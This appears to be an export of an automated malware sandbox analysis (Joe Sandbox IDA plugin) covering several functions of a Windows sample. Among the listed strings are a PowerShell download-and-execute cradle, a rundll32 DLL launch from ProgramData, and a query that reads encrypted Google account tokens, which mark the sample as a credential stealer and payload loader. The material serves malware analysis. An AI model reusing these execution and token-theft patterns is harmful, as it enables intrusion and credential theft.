                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Processmemset$MemoryOpenRead
                                      • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                      • API String ID: 2048220554-1622206642
                                      • Opcode ID: f17f3f8c5b554925d222f5329579b540a3303fc8f9fa1dbaceb317b427c7f111
                                      • Instruction ID: 121d36775220963627cea9247135e6d7eeb509a557b2a20cc222ef49b544435d
                                      • Opcode Fuzzy Hash: f17f3f8c5b554925d222f5329579b540a3303fc8f9fa1dbaceb317b427c7f111
                                      • Instruction Fuzzy Hash: 17613671D10209ABEB34AFA4CC45BEFF7B99F44350F044278F618A72D1EBB499548BA1
                                      Function 002FDC70 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103stringmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heaplstrlenstrchr$AllocateProcessstrcpy_s
                                      • String ID: 0123456789ABCDEF
                                      • API String ID: 1327626442-2554083253
                                      • Opcode ID: e06e4223512e74cb1e907ba4f2623a4d36b498a3fb6df374a38ae2850ccc9a4f
                                      • Instruction ID: 4895b0ec020d68bf7141d3c6a065a17324cf22572f49bb378f1ca4f1420b09be
                                      • Opcode Fuzzy Hash: e06e4223512e74cb1e907ba4f2623a4d36b498a3fb6df374a38ae2850ccc9a4f
                                      • Instruction Fuzzy Hash: CB31C57291011DABCB11DFA9DC84AFEF7BDBB49340F004269E904E7351DB319A01CBA0
                                      Function 00301920 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 148COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 00300B80: GetSystemTime.KERNEL32(?,02F46C20,003101E9,?,00000000,?,?,?,?,?,002F46E7,?,00000014), ref: 00300BA9
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00301A8D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$<$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      • API String ID: 2215929589-38637897
                                      • Opcode ID: bdee5d34a87375b26ca4a08886dde90c3ebb653893c2f8a7a4b6aa8b22bc2dc2
                                      • Instruction ID: 8be1dfad54423fb09d044e6168daa3865dc19c9d499c06e95c871aa5fe5af653
                                      • Opcode Fuzzy Hash: bdee5d34a87375b26ca4a08886dde90c3ebb653893c2f8a7a4b6aa8b22bc2dc2
                                      • Instruction Fuzzy Hash: E5510C71D2010CAADB59EBA0DA62DFDF778AF14780F504179F60672291EF706A58CF50
                                      Function 002F85F0 Relevance: 10.8, APIs: 4, Strings: 3, Instructions: 282stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 002F6E90: memset.MSVCRT ref: 002F6EE7
                                        • Part of subcall function 002F6E90: LocalAlloc.KERNEL32(00000040,?), ref: 002F6F1E
                                      • lstrlen.KERNEL32(00000000), ref: 002F87C3
                                        • Part of subcall function 00300DA0: LocalAlloc.KERNEL32(00000040,002F87D9,?,?,?,?,002F87D8,00000000,00000000), ref: 00300DBC
                                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 002F87E9
                                      • lstrlen.KERNEL32(00000000), ref: 002F88AE
                                      • lstrlen.KERNEL32(00000000), ref: 002F88C2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$AllocLocallstrcat$memset
                                      • String ID: AccountId$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                      • API String ID: 4178852800-465000181
                                      • Opcode ID: dd42dac133cd5527fe5a311886f4b74228662c0d08a19ed2248ad12fb86402a5
                                      • Instruction ID: dcb7798e5f13dbe30dc178b434283f7754b6c565b5c63293602343199267bc28
                                      • Opcode Fuzzy Hash: dd42dac133cd5527fe5a311886f4b74228662c0d08a19ed2248ad12fb86402a5
                                      • Instruction Fuzzy Hash: 85A1037292010DABDB55EBA4DE56DFEB378AE54780F504138F60272291EF70AA18CE61
                                      Function 00303420 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 224COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 00300B80: GetSystemTime.KERNEL32(?,02F46C20,003101E9,?,00000000,?,?,?,?,?,002F46E7,?,00000014), ref: 00300BA9
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00303667
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                      • String ID: "" $.dll$<$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                      • API String ID: 2215929589-3594953769
                                      • Opcode ID: ed562fd40cf51ca4bc22af7a7c0719ebde71649b59f03344575937da1da554a0
                                      • Instruction ID: bd8ed18b79fc4617ea2e5626229a8cb35a126f14a60a81445ac797899b92faea
                                      • Opcode Fuzzy Hash: ed562fd40cf51ca4bc22af7a7c0719ebde71649b59f03344575937da1da554a0
                                      • Instruction Fuzzy Hash: D281BE72C2010CAADB59FBA0D9A6DFDF778AF14780F504139F612722A1EF706659CE60
                                      Function 002FD700 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 002FD719
                                        • Part of subcall function 0030F6E0: std::exception::exception.LIBCMT ref: 0030F6F5
                                        • Part of subcall function 0030F6E0: __CxxThrowException@8.LIBCMT ref: 0030F70A
                                        • Part of subcall function 0030F6E0: std::exception::exception.LIBCMT ref: 0030F71B
                                      • std::_Xinvalid_argument.LIBCPMT ref: 002FD73A
                                      • std::_Xinvalid_argument.LIBCPMT ref: 002FD755
                                      • memcpy.MSVCRT(?,?,?), ref: 002FD7BD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throwmemcpy
                                      • String ID: invalid string position$string too long
                                      • API String ID: 285807467-4289949731
                                      • Opcode ID: fd271a229123a52321b56c1af0aaef70052915c87fb33ac4361730fb48e0b2b5
                                      • Instruction ID: 6909f7a8ad612a7f90db343b20f63fd0efa3f8aafa2a6c6b1acb41b9a5cb1526
                                      • Opcode Fuzzy Hash: fd271a229123a52321b56c1af0aaef70052915c87fb33ac4361730fb48e0b2b5
                                      • Instruction Fuzzy Hash: 7431EA323142098FD725AE6CE890B7AF3EAEF94791B100A3EE642CF781D771D8508790
                                      Function 003058B0 Relevance: 9.1, APIs: 6, Instructions: 130registrystringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 003058D5
                                      • RegOpenKeyExA.ADVAPI32(80000001,02F45820,00000000,00020119,?), ref: 003058F4
                                      • RegQueryValueExA.ADVAPI32(?,02F45450,00000000,00000000,00000000,000000FF), ref: 00305918
                                      • RegCloseKey.ADVAPI32(?), ref: 00305922
                                      • lstrcat.KERNEL32(?,00000000), ref: 00305947
                                      • lstrcat.KERNEL32(?,02F45528), ref: 0030595B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseOpenQueryValuememset
                                      • String ID:
                                      • API String ID: 2623679115-0
                                      • Opcode ID: 4339bbc8b53225af49314f1ba83445af58d961edd4cd9e895c2188b5babe71e3
                                      • Instruction ID: af336045e9a47618106e17372f6abdfdb94f3753dd1a63f6bb068aa9f1243004
                                      • Opcode Fuzzy Hash: 4339bbc8b53225af49314f1ba83445af58d961edd4cd9e895c2188b5babe71e3
                                      • Instruction Fuzzy Hash: FE41B1B5911208ABCB15EFA0CC5AFEE7738AF54340F408658FA05561C1EA71AA98CFA1
                                      Function 00301C00 Relevance: 9.1, APIs: 6, Instructions: 106stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • strtok_s.MSVCRT ref: 00301C24
                                      • StrCmpCA.SHLWAPI(00000000,00313B6C,00000000), ref: 00301C6C
                                      • StrCmpCA.SHLWAPI(00000000,00313B6C,00000000), ref: 00301CB2
                                      • StrCmpCA.SHLWAPI(00000000,00313B6C), ref: 00301CDE
                                      • StrCmpCA.SHLWAPI(00000000,00313B6C), ref: 00301D0A
                                      • strtok_s.MSVCRT ref: 00301D3C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strtok_s
                                      • String ID:
                                      • API String ID: 3330995566-0
                                      • Opcode ID: 0af6430af0e890ea9ff340e93548a6331958b9d718ff419e7788a76b2ee21dd3
                                      • Instruction ID: 1767d6f1596bbd68627015f7c555b2582ed63294ebf4275542744e2ac0c86cda
